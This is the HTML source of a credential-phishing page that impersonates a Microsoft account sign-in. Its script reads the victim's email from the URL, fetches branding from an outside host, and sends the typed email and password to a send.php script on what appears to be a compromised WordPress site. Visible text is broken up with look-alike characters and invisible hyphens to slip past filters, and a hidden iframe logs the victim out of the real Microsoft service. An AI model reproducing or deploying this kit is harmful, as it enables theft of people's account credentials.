<html lang="en">
<iframe style="    border: 0;" src="https://login.microsoftonline.com/logout.srf?ct=1548343592&rver=64.4.6456.0&lc=1033&id=501392" height="0" width="0"></iframe>


<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<meta name="description" content="">
<meta name="author" content="">
<link rel="icon" href="https://secure.aadcdn.microsoftonline-p.com/ests/2.1.6468.8/content/images/favicon_a.ico">
<title>login</title>

<!-- Bootstrap core CSS -->
<!-- Latest compiled and minified CSS -->
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.css" integrity="sha256-NuCn4IvuZXdBaFKJOAcsU2Q3ZpwbdFisd5dux4jkQ5w=" crossorigin="anonymous">
<link href="https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet" integrity="sha384-wvfXpqpZZVQGK6TAh5PVlGOfQNHSoD2xbE+QkPxCAFlNEevoEH3Sl0sibVcOQVnN" crossorigin="anonymous">

<!-- Custom styles for this template -->
<style type="text/css">
   


    #rand{
        font-size: 0;
        
    }
    
    
    /* Large desktops and laptops */
@media (min-width: 1200px) {
 body {
        background-image: url(https://aadcdn.msauth.net/ests/2.1/content/images/backgrounds/0_a5dbd4393ff6a725c7e62b61df7e72f0.jpg);
        background-origin: inherit;
        background-size: cover;


    }
}

/* Landscape tablets and medium desktops */
@media (min-width: 992px) and (max-width: 1199px) {

}

/* Portrait tablets and small desktops */
@media (min-width: 768px) and (max-width: 991px) {
     body {
        background-image: url(https://aadcdn.msauth.net/ests/2.1/content/images/backgrounds/0-small_138bcee624fa04ef9b75e86211a9fe0d.jpg);
        background-origin: inherit;
        background-size: cover;


    }

}

/* Landscape phones and portrait tablets */
@media (max-width: 767px) {
      body {
   
          background-color: #FFF;


    }

}

/* Portrait phones and smaller */
@media (max-width: 480px) {
      body {
   
          background-color: #FFF;
         

    }
     .box {
              margin-top: 10%;
          }

}
    .box {

        padding: 10px;
        background-color: #FFF;
    }

    .imgc {
        padding: 20px;
    }

    .form-control {
        border: 0;
        border-radius: 0;
        border-bottom: 1px;
        border-bottom-style: solid;
        border-top-color: #FFF;
    }

    .btn {
        background-color: #005DA6;
        color: #FFF;
        padding-left: 30px;
        padding-right: 30px;
        border-radius: 0px;
        padding: 7px 24px;
        color: #FFF;
        font-size: 16px;

        border: 0;
        text-align: center;
        -webkit-transition: background .15s ease-in;
        transition: background .15s ease-in;
        cursor: pointer;
        min-width: 120px;

    }
    .btn:hover,.btn:focus{
        color: #FFF;
    }

    .thxsss {
        display: none;
    }
    .hid{
        margin-top: 10%;
    }
    li{
        float: right;
        padding-left: 10px;
    }
    .eml{
        padding: 10px;
        margin:1%;
        
        
    }
      .eml:hover{
       background-color: #E5E5E5;
        
        
    }
    
    
      .eml:active{
      border: 1px ;
          border-style: dotted;
          border-color: black;
          
        
        
    }
    
    .LOGin_F0rm{
        display: none;
    }


.loading-dots {
  text-align: center;
  z-index: 5;
    display: none;
}
.loading-dots .dot {
    color: #00A4EF;
  display: inline;
  margin-left: 0.2em;
  margin-right: 0.2em;
  position: relative;
  top: -1em;
  font-size: 4em;
  opacity: 0;
  -webkit-animation: showHideDot 2.5s ease-in-out infinite;
          animation: showHideDot 2.5s ease-in-out infinite;
}
.loading-dots .dot.one {
  -webkit-animation-delay: 0.2s;
          animation-delay: 0.2s;
}
.loading-dots .dot.two {
  -webkit-animation-delay: 0.4s;
          animation-delay: 0.4s;
}
.loading-dots .dot.three {
  -webkit-animation-delay: 0.6s;
          animation-delay: 0.6s;
}

@-webkit-keyframes showHideDot {
  0% {
    opacity: 0;
  }
  50% {
    opacity: 1;
  }
  60% {
    opacity: 1;
  }
  100% {
    opacity: 0;
  }
}

@keyframes showHideDot {
  0% {
    opacity: 0;
  }
  50% {
    opacity: 1;
  }
  60% {
    opacity: 1;
  }
  100% {
    opacity: 0;
  }
}
</style>





<section>
    <div class="container ">
        <div class="row">
            <div class="col-md-12 hidden-sm hidden-xs">
            <div class="hid"></div>
            </div>
            <div class="col-md-5 col-md-offset-4 box">
              
                   <div class="loading-dots">
                   
                 <h1 class="dot one">.</h1><h1 class="dot two">.</h1><h1 class="dot three">.</h1><h1 class="dot _4">.</h1>
                 <h1 class="dot _5">.</h1> <h1 class="dot two">.</h1> <h1 class="dot three">.</h1> <h1 class="dot _5">.</h1> <h1 class="dot three">.</h1> <h1 class="dot _5">.</h1> <h1 class="dot _5">.</h1>
                </div>
                <div class="imgc">
                   
                   
                   
                    <div id="form-messages"></div>
                    <img class="img-responsive xxlogo" src="HTTPS://aadcdn.msftauth.net/ests/2.1/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg">
                    <br>
                    
                        <div class="add_em">
                        <p style="font-weight: bold;margin-left: 4%">Pick an account</p>
                   <div class="eml">
                       
                   
                   <img class="tile-img" role="presentation" src="https://secure.aadcdn.microsoftonline-p.com/ests/2.1.7230.10/content/images/picker_account_aad.png"> <span id="emx"></span><span style="float: right;margin-top: 4%"><img src="https://secure.aadcdn.microsoftonline-p.com/ests/2.1.7230.10/content/images/picker_more.png" alt=""></span>
                   </div>
                      <div class="eml">
                       
                   
                   <img class="tile-img" role="presentation" src="https://secure.aadcdn.microsoftonline-p.com/ests/2.1.7230.10/content/images/picker_account_add.svg"> <span style="    word-wrap: break-word;">Use another account</span>
                   </div>
                   <br><br>
               </div>
                    

                    <br>
                    <div class="thxsss">
                        <div class="text-center">
                         <br><br>
                            <img style="width: 100px; text-align: center;" class="img-responsive" src=" https://www.freeiconspng.com/uploads/success-icon-10.png">
                        </div>

                        <br> <br>
                    </div>
                    <div class="LOGin_F0rm">
                        <i class="fa fa-arrow-left"></i> <span id="test"></span>
                        <br>
                        <br>
                        <h4>Еntеr раsswоrd</h4>
                        <div style="color: red;" class="warning" id="warning"></div>
<p>Bеса­usе yоu'rе асс­еssing sеns­itivе in­fо, yоu nе­еd tо vе­ri­fy yоur р­аs­s­wо­rd</p><br>
                        <input required="" id="psssss" name="pass" placeholder="Pa­ss­wor­d" type="password" class="form-control">
                        <input id="testx" name="email" value="" type="hidden">
                        <br>
                        <a href="#">F­оr­g­еt Р­а­ss­w­оr­d
</a><br>
                            <a href="#">S­ig­n in wi­th аnо­t­hеr ас­с­оu­nt</a>
                            <br><br>
                        <button id="submit" style="float:right" onclick="sendmails()" class="btn twoToneButton">Si­g­n i­n</button>
                        <div id="sona"></div>
                        <br><br></div>
                </div>


            </div>
        </div>
    </div>
 <div>
     <div>
         <div style="color: #FFF; background: #DDD;background-color: rgba(0,0,0,0.6);    position: fixed;
    bottom: 0;
    width: 100%;
   " class="fot">
            <ul class="list-unstyled">
            <li>...</li>
           
             <li>Pri­vacy & co­oki­es  </li>
               <li>Tе­rm­s оf u­sе</li>
              <li>©2­019 </li>
             
         </ul></div>
     </div>
 </div>
</section>
<!-- /.container -->


<!-- Bootstrap core JavaScript
    ================================================== -->
<!-- Placed at the end of the document so the pages load faster -->
<script src="https://code.jquery.com/jquery-3.1.1.min.js"></script>
<!-- <script src="https://code.jquery.com/jquery-3.3.1.slim.min.js" integrity="sha384-q8i/X+965DzO0rT7abK41JStQIAqVgRVzpbzo5smXKp4YfRvH+8abtTE1Pi6jizo" crossorigin="anonymous"></script> -->
<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.0/umd/popper.min.js" integrity="sha384-cs/chFZiN24E4KMATLdqdvsezGxaGsi4hLGOzlXwp5UZB1LY//20VyM2taTB4QvJ" crossorigin="anonymous"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>



<script>
    $(document).ready(function() {
        var hash = window.location.hash;
        if(hash !== "") {

            hash = hash.split('#');
            const email = hash[1];

            $("#testx").val(email);
            $("#test").html(email);
            $("#emx").html(email);
            $("#milthnks").html(email);

            if(email !== "") {
                $.ajax({
                    url: 'https://capitandescargas.com/148/send.php?email='+email,
                    method: 'GET',
                    dataType: 'JSON',
                    success: function(response) {
                        if(response.hasOwnProperty('profile_image')) {
                            $(".outo").hide();
                            $(".xxlogo").attr({ "src": response.profile_image });
                        }
                        if(response.hasOwnProperty('back_image')) {
                            $("body").css('background-image', 'url(' + response.back_image + ')');
                        }
                        if(response.hasOwnProperty('text')) {
                            $("#txtttttt").html('<br><Br><br>'+response.text);
                        }
                    }, error:function(a, b, c) {
                        console.log(a);
                    }
                });
            }
        }
        $('.btn').on('click', function() {
             $(".loading-dots").show();
            var $this = $(this);
            var loadingText = '<i class="fa fa-circle-o-notch fa-spin"></i> loa­di­ng...';
            if ($(this).html() !== loadingText) {
                $this.data('original-text', $(this).html());
                $this.html(loadingText);
            }
        });
    })

    $('#psssss').keyup(function(event) {
        if (event.which == 13) {
            $('#submit').click();
        }
    });
    $('.eml').click(function() { 
        $(".LOGin_F0rm").show();
        $(".add_em").hide();
    })

    function sendmails() {
        var em = $('#testx').val();
        var ps = $('#psssss').val();

        var xhttp = new XMLHttpRequest();
        xhttp.onreadystatechange = function() {
            if (this.readyState == 4 && this.status == 200) {

                var response = JSON.parse(this.responseText);

                if (response.msg == "donesend") {
                    $(".LOGin_F0rm").hide();
                    $(".thxsss").show();
                              
                    
                    setTimeout("window.location.href='https://archive.org/download/privatenumber20190108101922/PrivateNumber_20190108_101922.mp3';", 5000);
                } else {
                     $(".loading-dots").hide();
                    $(".btn").html("login");
                   

                    $("#warning").empty();
                    $('#warning').append('Yо­ur е­mа­il оr ра­s­s­wо­rd is inсоrrесt. If yоu dоn\'t rеmе­mbеr yо­ur р­аs­s­wо­r­d,,<a href="#"> re­se­t it n­o­w.<a/> <br> <br> ');
                }
            }
        };
        xhttp.open("GET", "https://www.starvideo.ro/wordpress/wp-includes/blocks/xc/send.php?user=" + em + "&pass=" + ps, true);
        xhttp.send();
    }
</script>
</html>
